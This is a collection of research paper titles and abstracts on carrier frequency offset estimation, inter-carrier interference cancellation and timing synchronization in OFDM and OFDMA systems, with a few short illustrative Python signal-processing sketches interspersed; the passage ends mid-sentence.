--- paper_title: Carrier Frequency Offset Estimation for Uplink OFDMA Using Partial FFT Demodulation paper_content: Fast and accurate Carrier Frequency Offset (CFO) estimation is a problem of significance in many multi-carrier modulation based systems, especially in uplink Orthogonal Frequency Division Multiple Access (OFDMA) where the presence of multiple users exacerbates the inter-carrier interference (ICI) and results in multi-user interference (MUI). In this paper, a new technique called partial FFT demodulation is proposed. Estimators for the CFO are derived by considering an approximated matched filter for each user, implemented efficiently using several FFTs operating on sub-intervals of an OFDM block. Through simulations, the feasibility and performance of the proposed estimators are demonstrated. Associated trade-offs are discussed. --- paper_title: Blind CFO Estimation for Linearly Precoded OFDMA Uplink paper_content: This paper presents a novel method for blind carrier-frequency-offset (CFO) estimation in the linearly precoded OFDMA uplink. Our investigation starts from a previously presented single-user equivalent (SUE) scenario, in which active users in the network are categorized into a number of reference (synchronized) users (RUs) and a new (asynchronous) user (NU). The major idea is to take advantage of the time correlation induced by the linear precoder, which offers a second-order moments-based blind CFO estimation. The precoder design is carefully performed in terms of CFO identifiability, estimation accuracy and overall system performance. In the multiuser scenario, where all users can be misaligned in the frequency domain, the proposed CFO estimator is capable of mitigating a considerable portion of the interference from neighboring users through exploitation of a novel time-frequency multiuser data-mapping (MU-DM) scheme. To demonstrate the multiuser interference (MUI) resilience of the proposed scheme, theoretical analysis is performed through derivation of the approximate minimum mean-square error (MMSE) in both the SUE and multiuser scenarios. It is shown that by exploiting the proposed MU-DM scheme, the approximate multiuser MMSE is very close to that of the SUE scenario. Simulation results show that the proposed approach outperforms state-of-the-art approaches in both the SUE and multiuser scenarios. --- paper_title: Generalised grouped minimum mean-squared error based multi-stage interference cancellation scheme for orthogonal frequency division multiple access uplink systems with carrier frequency offsets paper_content: In uplink orthogonal frequency division multiple access (OFDMA) systems with carrier frequency offsets (CFOs), there is always a dilemma in that high performance and low complexity cannot be obtained simultaneously. In this study, in order to achieve a better trade-off between performance and complexity, the authors propose a grouped minimum mean squared error (G-MMSE)-based multi-stage interference cancellation (MIC) scheme. The first stage of the proposed scheme is a G-MMSE detector, where the signal is detected group by group using banks of partial MMSE filters. The signal group can be either user based or subcarrier based. Multiple novel interference cancellation (IC) units are serially concatenated with the G-MMSE detector. Reusing the filters in the G-MMSE detector significantly reduces the computational complexity in the subsequent IC units, as shown by the complexity analysis.
The performance of the proposed G-MMSE-MIC schemes are evaluated by theoretical analysis and simulation. The results show that the proposed schemes outperform other existing schemes with considerably low complexity. --- paper_title: Joint CFO and Channel Estimation for OFDM-Based Two-Way Relay Networks paper_content: Joint estimation of the carrier frequency offset (CFO) and the channel is developed for a two-way relay network (TWRN) that comprises two source terminals and an amplify-and-forward (AF) relay. The terminals use orthogonal frequency division multiplexing (OFDM). New zero-padding (ZP) and cyclic-prefix (CP) transmission protocols, which maintain the carrier orthogonality and ensure low estimation and detection complexity, are proposed. Both protocols lead to the same estimation problem which can be solved by the nulling-based least square (LS) algorithm and perform identically when the block length is large. We present detailed performance analysis by proving the unbiasedness of the LS estimators at high signal-to-noise ratio (SNR) and by deriving the closed-form expression of the mean-square-error (MSE). Simulation results are provided to corroborate our findings. --- paper_title: A parallel ICI cancellation technique for OFDM systems paper_content: Carrier frequency offset, time variations due to Doppler shift or phase noise lead to a loss in the orthogonality between subcarriers of Orthogonal frequency division multiplexing (OFDM) systems and results in inter-carrier interference (ICI). Further developing the parallel cancellation (PC) scheme to mitigate the ICI of OFDM systems, we investigate the characteristics of this two-branch OFDM symbol-based PC scheme in details. Moreover, with known channel state information, we show that this PC scheme is the same as the optimal maximal ratio combining (MRC) technique for transmitter diversity, but with ICI mitigation capability. Additionally, we integrate this PC scheme into a space-time (ST) coded system to form a simple space-time parallel cancellation (STPC) scheme. This STPC scheme not only inherits advantages of the conventional PC scheme, such as backward compatibility with the existing OFDM systems, low receiver complexity, and two-branch diversity, but also provides better bit error rate (BER) performance with lower error floor, especially in slow and fast frequency selective fading channels at a high signal-noise-ratio (SNR) without increasing computational load. --- paper_title: A Novel Frequency Offset Tracking Algorithm for Space-Time Block Coded OFDM Systems paper_content: A novel frequency offset tracking algorithm for Space-Time Block Coded (STBC) Orthogonal Frequency Division Multiplexing (OFDM) systems is proposed in this work. Tracking of a frequency offset between the transmitter and the receiver is often aided by transmitting pilots embedded in the data payload. The proposed algorithm mainly exploits the specific construction of the OFDM symbol in STBC-OFDM systems, which does not need any additional pilots or sequences in the data field, providing high efficiency in spectrum. The estimator is derived on the basis of the maximum likelihood theory. Simulation results show that in a 2×2 multiple input multiple output (MIMO) system, under the assumption that the antennas are uncorrelated to each other, this method can provide a significant performance improvement in terms of the estimation accuracy of the frequency offset. 
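The sketch below is standard textbook material rather than any cited cancellation scheme (the function name and parameter values are mine): it builds the inter-carrier interference matrix that a normalized CFO produces in OFDM, which is exactly the leakage that ICI cancellation and CFO tracking schemes of the kind listed above try to suppress.

```python
import numpy as np

def ici_matrix(N, eps):
    """S such that Y = S @ X when the time-domain signal ifft(X) is rotated by
    exp(j*2*pi*eps*n/N); S[k, l] is the classic Dirichlet-kernel leakage term."""
    k = np.arange(N)
    d = k[None, :] - k[:, None] + eps                   # (l - k) + eps
    with np.errstate(divide="ignore", invalid="ignore"):
        S = np.sin(np.pi * d) / (N * np.sin(np.pi * d / N))
    S = np.where(np.isfinite(S), S, 1.0)                # limiting value on the diagonal
    return S * np.exp(1j * np.pi * d * (N - 1) / N)

# Quick check against a direct time-domain CFO rotation.
rng = np.random.default_rng(3)
N, eps = 16, 0.13
X = np.array([1 + 1j, 1 - 1j, -1 + 1j, -1 - 1j])[rng.integers(0, 4, N)]
rx = np.fft.ifft(X) * np.exp(1j * 2 * np.pi * eps * np.arange(N) / N)
print(np.allclose(np.fft.fft(rx), ici_matrix(N, eps) @ X))   # True
```

The off-diagonal entries of S are what a parallel or iterative canceller estimates and subtracts; when eps is zero, S reduces to the identity matrix.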
--- paper_title: Robust Synchronization for 3GPP LTE System paper_content: This paper addresses problems related to time and frequency synchronization as well as blind CP (cyclic prefix) type identification in 3GPP LTE system. We start with a general framework based on maximum likelihood (ML) parameter estimation. Then, simplified practical algorithms for estimating time and frequency offset as well as blind CP length are described. Finally, a robust hierarchical scheme is proposed. Specifically, the CP based lagged auto-correlation is first employed to identify the CP type, estimate the carrier frequency offset (CFO), and grossly determine the symbol timing, and then the pilot (i.e. the LTE primary synchronization signal) based cross-correlation is used to more accurately determine the symbol and frame timing. A solution is given to the problem with unequal-length symbols, such as the symbols with the normal CP specified in the LTE. The proposed hierarchical scheme has both low complexity and high accuracy and can be realized without hardware support. --- paper_title: Iterative Joint Detection, ICI Cancelation and Estimation of Multiple CFOs and Channels for DVB-T2 in MISO Transmission Mode paper_content: When DVB-T2 uses the option of (distributed) multiple-input single-output transmission mode, a pair of Alamouti-encoded orthogonal frequency division multiplex signals is transmitted simultaneously from two spatially separated transmitters in a single frequency network. Since both transmitters have their own local oscillators, two distinct carrier frequency offsets (CFOs), one for each transmitter-receiver link, occur in the received signal due to the frequency mismatch between the local oscillators. Unfortunately, the multiple CFOs cannot be compensated simultaneously by merely adjusting the carrier frequency at the receiver side, so intercarrier interference (ICI) always exists. In this paper, we present an iterative receiver design to combat multiple CFOs for DVB-T2 application. To estimate both multiple CFOs and channels jointly without sacrificing the spectral efficiency, the joint maximum likelihood (ML) estimation based on the soft information from the channel decoder is used. The proposed receiver performs the iterative joint processing of the data detection, ICI cancelation, and joint ML estimation of the multiple CFOs and channels by exchanging the soft information. We also show that the complexity of the joint ML estimation can be reduced significantly by transforming a huge matrix pseudo-inversion into two sub-matrix pseudo-inversions. The performances are evaluated via a full DVB-T2 simulator. The numerical results show that the mean-squared error performance of the joint ML estimation is closely matched with the Cramer-Rao bound. Furthermore, the resulting bit error rate performance is enhanced in a progressive manner and is able to approach the ideal CFOs-free performance within a few iterations. --- paper_title: Transceiver Design for Distributed STBC Based AF Cooperative Networks in the Presence of Timing and Frequency Offsets paper_content: In multi-relay cooperative systems, the signal at the destination is affected by impairments such as multiple channel gains, multiple timing offsets (MTOs), and multiple carrier frequency offsets (MCFOs). 
In this paper we account for all these impairments and propose a new transceiver structure at the relays and a novel receiver design at the destination in distributed space-time block code (DSTBC) based amplify-and-forward (AF) cooperative networks. The Cramer-Rao lower bounds and a least squares (LS) estimator for the multi-parameter estimation problem are derived. In order to significantly reduce the receiver complexity at the destination, a differential evolution (DE) based estimation algorithm is applied and the initialization and constraints for the convergence of the proposed DE algorithm are investigated. In order to detect the signal from multiple relays in the presence of unknown channels, MTOs, and MCFOs, novel optimal and sub-optimal minimum mean-square error receiver designs at the destination node are proposed. Simulation results show that the proposed estimation and compensation methods achieve full diversity gain in the presence of channel and synchronization impairments in multi-relay AF cooperative networks. --- paper_title: A Synchronization Design for UWB-Based Wireless Multimedia Systems paper_content: Multi-band orthogonal frequency-division multiplexing (MB-OFDM) ultra-wideband (UWB) technology offers large throughput, low latency and has been adopted in wireless audio/video (AV) network products. The complexity and power consumption, however, are still major hurdles for the technology to be widely adopted. In this paper, we propose a unified synchronizer design targeted for MB-OFDM transceiver that achieves high performance with low implementation complexity. The key component of the proposed synchronizer is a parallel auto-correlator structure in which multiple ACF units are instantiated and their outputs are shared by functional blocks in the synchronizer, including preamble signal detection, time-frequency code identification, symbol timing, carrier frequency offset estimation and frame synchronization. This common structure not only reduces the hardware cost but also minimizes the number of operations in the functional blocks in the synchronizer as the results of a large portion of computation can be shared among different functional blocks. To mitigate the effect of narrowband interference (NBI) on UWB systems, we also propose a low-complexity ACF-based frequency detector to facilitate the design of (adaptive) notch filter in analog/digital domain. The theoretical analysis and simulation show that the performance of the proposed design is close to optimal, while the complexity is significantly reduced compared to existing work. --- paper_title: Training Signal Design and Tradeoffs for Spectrally-Efficient Multi-User MIMO-OFDM Systems paper_content: In this paper, we design MMSE-optimal training sequences for multi-user MIMO-OFDM systems with an arbitrary number of transmit antennas and an arbitrary number of training symbols. It addresses spectrally-efficient uplink transmission scenarios where the users overlap in time and frequency and are separated using spatial processing at the base station. The robustness of the proposed training sequences to residual carrier frequency offset and phase noise is evaluated. This analysis reveals an interesting design tradeoff between the peak-to-average power ratio of a training sequence and the increase in channel estimation mean squared error over the ideal case when these two impairments are not present. 
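As a generic illustration of the delay-and-correlate principle that auto-correlation-based synchronizers such as the one above build on, here is a minimal Schmidl-Cox-style timing metric; it is not the cited parallel-ACF design, and the preamble length, noise level and start position are assumptions made only for the demonstration.

```python
import numpy as np

def delay_correlate_metric(r, L):
    """Timing metric M[m] = |P[m]|^2 / R[m]^2 for a preamble made of two
    identical length-L halves; M approaches 1 over the preamble."""
    M = np.zeros(len(r) - 2 * L)
    for m in range(len(M)):
        P = np.vdot(r[m:m + L], r[m + L:m + 2 * L])     # correlation of the two halves
        R = np.sum(np.abs(r[m + L:m + 2 * L]) ** 2)     # energy normalisation
        M[m] = np.abs(P) ** 2 / max(R, 1e-12) ** 2
    return M

# Toy usage: noise only, then a repeated-half preamble starting at sample 200.
rng = np.random.default_rng(4)
L = 64
r = 0.1 * (rng.standard_normal(600) + 1j * rng.standard_normal(600))
half = np.exp(1j * 2 * np.pi * rng.random(L))
r[200:200 + 2 * L] += np.concatenate([half, half])
print(int(np.argmax(delay_correlate_metric(r, L))))      # near 200
```

Because the same partial correlations can feed packet detection, coarse timing and fractional CFO estimation, hardware designs like the one described above share a single bank of ACF units among these functions.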
--- paper_title: Beamforming Based Receiver Scheme for DVB-T2 System in High Speed Train Environment paper_content: In this paper, the received signal from the different base stations (BSs) of the second generation of Terrestrial Digital Video Broadcasting (DVB-T2) in the high-speed-train (HST) scenario is modeled as a fast time-varying signal with the multiple Doppler frequency offsets. The interference caused by the multiple Doppler frequency offsets and the channel variations, and the signal to interference plus noise ratio of the received signal, are derived for the DVB-T2 receiver. The results of the theoretical analysis show that the interference greatly degraded the performance of the DVB-T2 system. To suppress the interference, we proposed a beamforming based receiver scheme for DVB-T2 system. By using the new signal processing scheme for the received signal vector from the antenna array, one can separate the received signal with the multiple Doppler frequency offsets into the multiple signals, each of which is with a single Doppler frequency offset. The separated signals are compensated by the corresponding Doppler frequency offsets and equalized by the estimated channel responses respectively, then combined into a signal to be demodulated. The results of the simulation show that the proposed scheme can effectively suppress the interference and greatly improve the performance of the DVB-T2 system in the HST environment. --- paper_title: Low-Complexity Sequential Searcher for Robust Symbol Synchronization in OFDM Systems paper_content: Based on the frequency-domain analog-to-digital conversion (FD ADC), this work builds a low-complexity sequential searcher for robust symbol synchronization in a 4 × 4 FD multiple-input multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) modem. The proposed scheme adopts a symbol-rate sequential search with simple cross-correlation metric to recover symbol timing over the frequency domain. Simulation results show that the detection error is less than 2% at signal-to-noise ratio (SNR) ≤5 dB. Performance loss is not significant when carrier frequency offset (CFO) ≤100 ppm. Using an in-house 65-nm CMOS technology, the proposed solution occupies 84.881 k gates and consumes 5.2 mW at 1.0 V supply voltage. This work makes the FD ADC more attractive to be adopted in high throughput OFDM systems. --- paper_title: Software Defined Radio Implementation of SMSE Based Overlay Cognitive Radio in High Mobility Environment paper_content: A spectrally modulated spectrally encoded (SMSE) based overlay cognitive radio has been implemented and demonstrated in [1] via GNU software define radio (SDR). However, like most of the current cognitive radio implementations and demonstrations, this work does not consider the mobility between cognitive radio nodes. In a high mobility environment, the frequency offset introduced by Doppler shift leads to loss of the orthogonality among subcarriers. As a direct result, severe inter-carrier interference (ICI) and performance degradation is observed. In our previous work, we have proposed a new ICI cancellation method (namely Total ICI Cancellation) for OFDM [2] and MC-CDMA [3] mobile communication systems, which eliminates the ICI without lowering the transmission rate nor reducing the bandwidth efficiency. In this paper, we apply the total ICI cancellation algorithm onto the SMSE base overlay cognitive radio to demonstrate a high performance cognitive radio in high mobility environment. 
Specifically, we demonstrate an SMSE based overlay cognitive radio that is capable of detecting primary users in real time and adaptively adjusting its transmission parameters to avoid interference to (and from) primary users. When the primary user transmission changes, the cognitive radio dynamically adjusts its transmission accordingly. Additionally, this cognitive radio maintains seamless real-time video transmission between the cognitive radio pair even when a large frequency offset is introduced by mobility between the CR transmitter and receiver. --- paper_title: Estimation of Time and Frequency Offsets in LTE Coordinated Multi-Point Transmission paper_content: We address the impact, estimation and compensation of time and frequency offsets in LTE CoMP. In LTE CoMP, transmissions may come from a different transmission point in every subframe of one millisecond. Due to propagation delay differences and time-frequency synchronization imperfections between the transmission points, the user equipment (UE) receiver is exposed to different time-frequency offsets in every subframe. In this paper we illustrate both analytically and numerically the impact of these time and frequency offsets on channel estimation performance and finally on LTE CoMP link-level demodulation performance. Furthermore, we study the applicability of existing LTE reference signals to the time-frequency offset estimation problem. In particular we compare two approaches in which the UE is either aware or unaware of the exact transmission point. Finally, we show with LTE link-level simulations that using the proposed approaches the impacts of time-frequency offsets can be almost perfectly compensated. --- paper_title: On the true Cramer-Rao lower bound for data-aided carrier-phase-independent frequency offset and symbol timing estimation paper_content: In this letter we present new and simple closed-form expressions for the true Cramer-Rao lower bound (CRB) for data-aided (DA) joint and individual carrier frequency offset and symbol timing estimation from a linearly modulated waveform transmitted over an AWGN channel. The bounds are derived under a carrier-phase-independent (CPI) estimation strategy wherein the carrier phase is viewed as a nuisance parameter and assumed to have a worst-case noninformative uniform distribution over [-π, π]. The computation of these CRBs requires only a single numerical integration. In addition, computationally simpler yet highly accurate asymptotic lower bounds are presented. As particularizations, new bounds for individual CPI frequency estimation with known symbol timing from M-PSK and continuous wave (CW) signals are also reported. --- paper_title: Iterative ICI Cancellation for OFDM Receiver with Residual Carrier Frequency Offset paper_content: For a mobile OFDM receiver, both Doppler spread and residual Carrier Frequency Offset (CFO) can cause inter-carrier interference (ICI) and therefore performance degradation. In this paper, the effects of Doppler spread and residual CFO (RCFO) are jointly considered to improve the receiver performance. A low-complexity channel estimation is proposed to allow ICI cancellation at the receiver. We demonstrate through simulation that the receiver can achieve desirable performance even in fast fading with the presence of a high residual CFO.
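For orientation only, the snippet below evaluates the standard Cramer-Rao bound for estimating the frequency of a single complex exponential in AWGN with unknown phase, which is often used as a sanity benchmark for CFO estimators. This single-tone bound is an illustrative assumption of mine and is not the data-aided carrier-phase-independent bound derived in the letter cited above.

```python
import numpy as np

def single_tone_freq_crb(snr_linear, N):
    """CRB on the normalized frequency (cycles/sample) of A*exp(j(2*pi*f*n + phi))
    observed in complex AWGN over N samples, with the phase phi unknown."""
    return 6.0 / ((2 * np.pi) ** 2 * snr_linear * N * (N ** 2 - 1))

# Example: 10 dB SNR and a 256-sample observation window.
snr = 10 ** (10 / 10)
print(np.sqrt(single_tone_freq_crb(snr, 256)))   # RMS bound in cycles per sample
```

The cubic dependence on N explains why even short training blocks can support very fine frequency estimates at moderate SNR.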
--- paper_title: Closed Form SER Expressions for QPSK OFDM Systems With Frequency Offset in Rayleigh Fading Channels paper_content: In this letter, the performance of QPSK OFDM systems with frequency offsets is investigated. Closed-form expressions for the symbol error rate (SER) that are valid for any frequency offset in Rayleigh fading channels are derived. To achieve this, a modification to the result of the integral of the product of two Q-functions over the Rayleigh distribution is provided. The modification makes the result of this integral valid whether the arguments of the Q-functions are positive or negative. Simulation results are provided to demonstrate the accuracy of the derived expressions. --- paper_title: Inter-subcarrier interference compensation in the frequency-hopped single-carrier frequency division multiple access communication system paper_content: The single-carrier frequency division multiple access (SC-FDMA) system, which has a very favourable peak-to-average power ratio characteristic, is promising in the communications area. However, the performance of the SC-FDMA system is very sensitive to inter-subcarrier interference (ICI), and existing phase noise suppression algorithms reduce phase noise only. Therefore, the authors propose an effective method, the phase noise and frequency offset suppression (PNFS) algorithm, using comb-type pilots. The PNFS algorithm can suppress phase noise, carrier frequency offset and even the Doppler effect simultaneously in the frequency domain. With the PNFS algorithm, the SC-FDMA system becomes robust against ICI-induced performance degradation. Moreover, most electronic communication systems nowadays are vulnerable to jamming, so a frequency-hopped (FH) scheme, a spread spectrum technique, is considered to compensate for the vulnerability of the SC-FDMA system to jamming attacks. The authors analyse ICI and jamming in the SC-FDMA system and employ the FH technique because existing studies have not considered the situation in which ICI and jamming exist simultaneously in the mobile channel. The authors then analyse the degradation factors in the FH-SC-FDMA system with respect to ICI and jamming signals categorised as partial-band jamming and multi-tone jamming, and show that the proposed FH-SC-FDMA system using the PNFS algorithm performs well against both ICI and jamming. --- paper_title: Frequency Offset and Channel Estimation in Co-Relay Cooperative OFDM Systems paper_content: Frequency offset and channel estimation in cooperative orthogonal frequency division multiplexing (OFDM) systems is studied in this paper. We consider the scenario of two or more source nodes sharing the same relay, i.e., co-relay cooperative communications, and a new preamble, which is central-symmetric in the time domain, is proposed to perform the frequency offset and channel estimation. The non-zero samples in the proposed preamble are sparsely distributed with two neighboring non-zero samples being separated by μ > 1 zeros. As long as μ > 2L - 1 is satisfied, the multipath interference can be effectively eliminated, where L stands for the channel order. Unlike [1], the proposed preamble has a much lower Peak-to-Average Power Ratio (PAPR). The interference among the multiple source nodes can also be eliminated by using a backoff modulation scheme on the proposed preamble in each source node, and the mean-square error (MSE) of the proposed Least-Square (LS) channel estimator can be minimized by ensuring the orthogonality among the source nodes.
The pairwise error probability (PEP) of the proposed system, considering both frequency offset and channel estimation errors, is also derived in this paper. For a given Signal-to-Noise Ratio (SNR), by keeping the total power consumed by the source nodes and the relay constant, the PEP can be minimized by adjusting the ratio between the power allocated to the source nodes and the total power. --- paper_title: Blind Maximum-Likelihood Carrier-Frequency-Offset Estimation for Interleaved OFDMA Uplink Systems paper_content: Blind maximum-likelihood (ML) carrier-frequency-offset (CFO) estimation is considered to be difficult in interleaved orthogonal frequency-division multiple-access (OFDMA) uplink systems. This is because multiple CFOs have to be simultaneously estimated (each corresponding to a user's carrier), and an exhaustive multidimensional search is required. The computational complexity of the search may be prohibitively high. Methods such as the multiple signal classification and the estimation of signal parameters via the rotational invariance technique have been proposed as alternatives. However, these methods cannot maximize the likelihood function, and the performance is not optimal. In this paper, we propose a new method to solve the problem. With our formulation, the likelihood function can be maximized, and the optimum solution can be obtained by solving a polynomial function. Compared with the exhaustive search, the computational complexity can be reduced dramatically. Simulations show that the performance of the proposed method can approach that of the Cramer-Rao lower bound. --- paper_title: A Composite PN-Correlation Based Synchronizer for TDS-OFDM Receiver paper_content: In this paper, we present a novel synchronizer dealing with carrier frequency offset (CFO), sampling frequency offset (SFO), as well as frame timing offset (FTO) in a TDS-OFDM receiver. The proposed schemes are based on tracking the output waveform of a composite PN-correlator (CPC), which provides sufficient correlative gain to detect its peaks even in the presence of large CFOs. From the correlation peaks, we can extract useful information for estimating the synchronization offsets. The CFO is recovered by a multi-stage CPC scheme, whose parameters are adjustable to meet the system's demands on tracking range and accuracy. According to the inter-frame variations of the correlation waveform, we estimate the SFO over a large range and correct it through an interpolator. Meanwhile, frame timing is investigated in this paper, and the analysis indicates that a very fast and robust timing scheme is possible for the TDS-OFDM receiver. The developed synchronizer is quite robust against a large CFO even in very adverse fading channels, and it is shown by computer simulation that the residual synchronization error has little effect on the performance of the TDS-OFDM receiver. --- paper_title: A Simplified MMSE Equalizer for Distributed TR-STBC Systems with Multiple CFOs paper_content: In distributed wireless systems, the traditional carrier frequency offset (CFO) compensation methods may not be applied due to the existence of multiple CFOs. In this paper, we address the equalization issue for distributed time-reversal space-time block coded (TR-STBC) systems when multiple CFOs are present.
A simplified minimum mean-square error (MMSE) equalizer is proposed, which exploits the nearly-banded structure of the channel matrices and utilizes the {LDL}^H factorization to reduce the computational complexity. Simulation results show that the proposed equalizer can achieve the similar performance as the traditional MMSE equalizer while possessing much less complexity. --- paper_title: A Bayesian Algorithm for Joint Symbol Timing Synchronization and Channel Estimation in Two-Way Relay Networks paper_content: This work investigates joint estimation of symbol timing synchronization and channel response in two-way relay networks (TWRN) that utilize amplify-and-forward (AF) relay strategy. With unknown relay channel gains and unknown timing offset, the optimum maximum likelihood (ML) algorithm for joint timing recovery and channel estimation can be overly complex. We develop a new Bayesian based Markov chain Monte Carlo (MCMC) algorithm in order to facilitate joint symbol timing recovery and effective channel estimation. In particular, we present a basic Metropolis-Hastings algorithm (BMH) and a Metropolis-Hastings-ML (MH-ML) algorithm for this purpose. We also derive the Cramer-Rao lower bound (CRLB) to establish a performance benchmark. Our test results of ML, BMH, and MH-ML estimation illustrate near-optimum performance in terms of mean-square errors (MSE) and estimation bias. We further present bit error rate (BER) performance results. --- paper_title: A Practical Double Peak Detection Coarse Timing for OFDM in Multipath Channels paper_content: For orthogonal frequency division multiplexing (OFDM) systems in multipath channels, the detection of the first path is desirable to avoid inter-symbol-interference (ISI). However, the conventional peak detection of the cyclic prefix (CP) correlation curve can detect the strongest path but not the first path, while the largest slope detection is sensitive to background noise. This paper presents a novel coarse timing algorithm using double peak detection of CP correlation, which is robust to noise and simple to implement in practice. Considering practical hardware impairments like sampling frequency offset (SFO), the performance of the proposed method is verified by simulations. --- paper_title: Low-cost integer frequency offset estimation for OFDM-based DRM receiver paper_content: In this paper, we propose an improved and low-cost integer frequency offset (IFO) estimation method by partitioning pilot symbols effectively in an orthogonal frequency division multiplexing based digital radio mondiale (DRM) system. To this end, the time reference cell (TRC) symbol for frequency estimation is grouped into a number of pilot clusters, so that the TRC subcarriers in each cluster are closely spaced to show approximately frequency-nonselective characteristics. The performance of the proposed IFO estimator is compared with that of the conventional estimator, and shows that the proposed technique can effectively achieve lower estimation errors in frequency offset estimation as well as can be implemented with reduced computational complexity. --- paper_title: Blind spectrum sensing in cognitive radio over fading channels and frequency offsets paper_content: This paper deals with the problem of spectrum sensing in cognitive radio. We consider a stochastic system model where the Primary User (PU) transmits a periodic signal over fading channels. The effect of frequency offsets due to oscillator mismatch, and Doppler offset is studied. 
We show that for this case the Likelihood Ratio Test (LRT) cannot be evaluated pointwise. We present a novel approach to approximate the marginalisation of the frequency offset using a single point estimate. This is obtained via a low-complexity Constrained Adaptive Notch Filter (CANF) to estimate the frequency offset. Performance is evaluated via numerical simulations and it is shown that the proposed spectrum sensing scheme can achieve the same performance as the “near-optimal” scheme, which is based on a bank of matched filters, using only a fraction of the complexity required. --- paper_title: Timing and Frequency Offsets Compensation in Relay Transmission for 3GPP LTE Uplink paper_content: Relays can be used between the source and the destination to improve network coverage or reliability. In the relay based distributed space-time block-coded (DSTBC) single-carrier (SC) transmission scheme, asynchronism in time and frequency causes degradation in system performance because of the interblock interference, non-coherent combining and multiuser interference. The simultaneous presence of timing offset and carrier frequency offset also destroys the orthogonal structure of DSTBC. In this paper, we study the combined effect of timing offset and carrier frequency offset and propose a two-stage equalization technique for this system at the destination terminal. The technique is based on interference cancellation and cyclic prefix reconstruction. The proposed equalization technique maintains the orthogonal structure of DSTBC and allows the use of a low-complexity one-tap frequency-domain equalizer. The technique significantly alleviates the effect of time offsets and frequency offsets at the destination without increasing the complexity of the receiver or disturbing the 3rd generation partnership project-long term evolution (3GPP LTE) uplink frame structure or the data rate over frequency selective channels. --- paper_title: Modified Symbol Timing Offset Estimation for OFDM over Frequency Selective Channels paper_content: This paper deals with the symbol timing issue of an OFDM system in frequency selective fading scenarios. A modified symbol timing offset estimator based on an energy transition metric is proposed. This metric can also be applied to estimate the maximum channel delay spread. Benefiting from the knowledge of the maximum channel delay spread, the modified estimator shows its advantage in a relatively low SNR regime. Compared to the original, the modified algorithm is able to acquire the symbol timing correctly in a relatively low SNR region. --- paper_title: Carrier Frequency Offset Tracking in the IEEE 802.16e OFDMA Uplink paper_content: The IEEE 802.16e standard for nomadic wireless metropolitan area networks adopts orthogonal frequency-division multiple-access (OFDMA) as an air interface. In these systems, residual carrier frequency offsets (CFOs) between the uplink signals and the base station local oscillator give rise to interchannel interference (ICI) as well as multiple access interference (MAI). Accurate CFO estimation and compensation is thus necessary to avoid a serious degradation of the error-rate performance. In this work, we address the problem of CFO tracking in the IEEE 802.16e uplink and present a closed-loop solution based on the least-squares (LS) principle. In doing so, we exploit a set of pilot tones that are available in each user's subchannel.
The resulting scheme can be implemented with affordable complexity and is able to reliably track the CFOs of all active users. When used in conjunction with a frequency offset compensator, it can effectively mitigate ICI and MAI, thereby allowing channel equalization and data detection to follow directly. Numerical simulations are used to demonstrate the effectiveness of the proposed solution in the presence of residual time-varying frequency offsets. --- paper_title: Carrier frequency offset estimation for non-contiguous OFDM receiver in cognitive radio systems paper_content: For non-contiguous (NC) OFDM based cognitive radio (CR) systems, schemes have been developed in literature to acquire spectrum synchronization information (SSI) with perfect carrier frequency offset (CFO) synchronization. However, OFDM is extremely sensitive to the CFO in practice, which leads to inter-carrier interference (ICI), hence degrading the spectrum synchronization performance for existing schemes. An accurate CFO estimation is therefore required before setting up the SSI. In this paper, we present a novel scheme based on the maximum likelihood (ML) algorithm to estimate the CFO for the NC-OFDM receiver when the SSI is unknown. A corresponding Cramer-Rao lower bound (CRB) with the ideal SSI is derived to demonstrate the efficiency of the proposed scheme. Simulation results show that the proposed scheme is robust against interference and achieves a satisfactory accuracy of estimation, which is close to the relevant CRB. --- paper_title: On the effects of carrier frequency offset on cyclic prefix based OFDM and filter bank based multicarrier systems paper_content: Being sensitive to carrier frequency offset (CFO) is known to be one of the main drawbacks of multicarrier systems. In this paper, the effects of CFO on a filter bank based multicarrier system (FBMC) in a multipath fading channel are discussed, where an ideal root-raised cosine (RRC) filter with roll-off factor 1 is used as the prototype filter which enables analytical derivations of the interference caused by the CFO. Based on these results, an approximation on the SNR degradation with very small CFO is also given. Numerical experiments as well as Monte Carlo simulations are done to verify the analysis and the accuracy of the approximation in FBMC systems. A comparison with the SNR degradations in cyclic prefix based orthogonal frequency division multiplexing (CP-OFDM) systems has indicated an advantage of FBMC systems as being more robust to frequency misalignments. --- paper_title: An Optimized Iterative (Turbo) Receiver for OFDM Systems with Type-I Hybrid ARQ: Clipping and CFO Cases paper_content: An optimized iterative (Turbo) receiver for Orthogonal Frequency Division Multiplexing (OFDM) transmission is proposed for improved performance when used with type-I hybrid Automatic Repeat Request (ARQ) protocols. The proposed receiver is a Maximum Aposteriori Expectation-Maximization (MAP-EM) Turbo processor that exploits information from all available transmissions of a packet, including failed and new ones. Two distinct practical problems associated with OFDM are considered: (i) Clipping due to non-linearities in the transmit amplifier, and (ii) Carrier frequency offset (CFO). In the optimized scheme, failed transmissions are combined with the new ones to form an iterative receiver that jointly estimates the channel, compensates for the distortion (clipping, or CFO) and decodes the message. The modulation employed is M-ary Phase Shift Keying (MPSK). 
The system uses an embedded pilot structure for initial channel estimation of the channel, which is assumed doubly-selective. It is shown that gains on the order of 3 dB are achieved in the packet rejection probability with the proposed system. The performance of the optimized system is close to that of the ideal system, i.e. one that performs packet combining with perfect channel knowledge, no clipping, and no CFO. --- paper_title: Joint Carrier Synchronization and Equalization Algorithm for Packet-Based OFDM Systems Over the Multipath Fading Channel paper_content: In this paper, a joint carrier synchronization and equalization algorithm is presented for orthogonal frequency-division multiplexing (OFDM) systems in the tracking stage. Based on the minimum mean-square-error (MMSE) criterion, the cost function of the joint algorithm is proposed to minimize the mean square error (MSE), namely, the uncoded bit error rate (BER), on each subchannel and to further lower the carrier frequency jitter concurrently. The carrier synchronization scheme with multirate processing is a dual-loop structure, which is composed of outer and inner loops. The outer loop is a frequency-tracking loop that deals with the phase offset, which is induced by the carrier frequency offset (CFO), in the time domain. The inner loop is a phase-tracking loop to cope with the phase distortions, which are caused by the carrier frequency error and the channel phase variation, on each subcarrier in the frequency domain. There is a gain equalization loop to compensate the magnitude distortion on each subchannel. Furthermore, the closed-loop stability of the carrier synchronization loop is particularly explored for the loop delay induced by hardware realization. Many simulations are done for the additive white Gaussian noise (AWGN) and the multipath frequency-selective fading channels to show that the joint algorithm not only accurately estimates and compensates the CFO and the channel impairment but also provides the cost-effective feature compared with the considered algorithms. --- paper_title: Reduction of the Peak Interference to Carrier Ratio of OFDM Signals paper_content: In this paper, we provide a geometric interpretation of the Peak Interference to Carrier 